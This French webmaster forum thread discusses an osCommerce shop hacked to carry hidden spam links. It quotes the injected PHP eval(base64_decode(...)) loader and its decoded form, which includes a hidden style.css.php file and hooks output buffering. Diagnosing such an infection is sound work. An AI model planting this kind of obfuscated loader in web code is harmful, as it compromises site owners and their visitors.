Virus ? liens externes invisibles apparut dans mon footer ?

nairod60

Nouveau WRInaute
Bonjour
Regarder sur mon site http://www.auxstickers.com environ 500 liens sont apparut dans mon footer ils sont invisible, regarder dans la source de la page pour les voir. Ils pointes tous vers des sites ecommerce infectés tout comme moi par les mêmes liens externes ? j'ai du choper ce truc avec un soft de seo
 

UsagiYojimbo

WRInaute accro
Ca ou tu t'es fait sniffer tes accès FTP (j'ai eu le cas sur le site d'un client dont le site s'est fait modifier de cette façon suite à la récupération de ses accès FTP).
 

Haroeris

WRInaute impliqué
bloques l'accès avec un htaccess pendant tes mises à jour, j'ai eu accès à des informations pendants quelques secondes. :wink:
 

nairod60

Nouveau WRInaute
J'ai trouvé! En haut de toute mes pages j'avais cette ligne (coder) :
"<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lei4zMTMvYXV4c3RpY2svd3d3L2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy9idXR0b25zL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>"

Et les fichiers sources étaient cachés dans le dossier admin.

Plus d'info ici "http://forums.oscommerce.com/topic/345957-evalbase64-decode-hack/"

J'ai chopé ca avec un soft seo que j'ai installé hier, je retrouve le nom et je le poste.

Cordialement DOrian
 

raljx

WRInaute passionné
Code:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/homez.313/auxstick/www/admin/includes/languages/english/images/buttons/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}
 

UsagiYojimbo

WRInaute accro
Je suis pas sûr que le soft SEO soit en cause. Il faut un soft capable de modifier les pages directement sur le serveur pour faire ça, et de traiter du php. Etant donné que tu utilise oscommerce, qui est connu pour ses failles plus que nombreuses, ça sent davantage l'injection SQL ou le détournement des accès FTP.

A ta place je changerais immédiatement mes identifiants FTP déjà.
 

nairod60

Nouveau WRInaute
Tu avais raison c'était bien une injection.
Faille sur oscommerce rc2a pourtant bien connue (on en apprend tous les jours...).
J'ai passé toute mon après midi et soirée a effacer tous les morceaux de code injecté (tous codés, ce qui de ne facilite pas la tache...) reste plus qu'à boucher la faille!
 

UsagiYojimbo

WRInaute accro
OsCommerce est franchement le script d'E-Commerce à proscrire, trop de trous de sécu dans tous les sens, et codé avec les pieds (même si à une époque ça ne l'empêchait pas de dominer le marché des scripts E-commerce).
 

Discussions similaires

Haut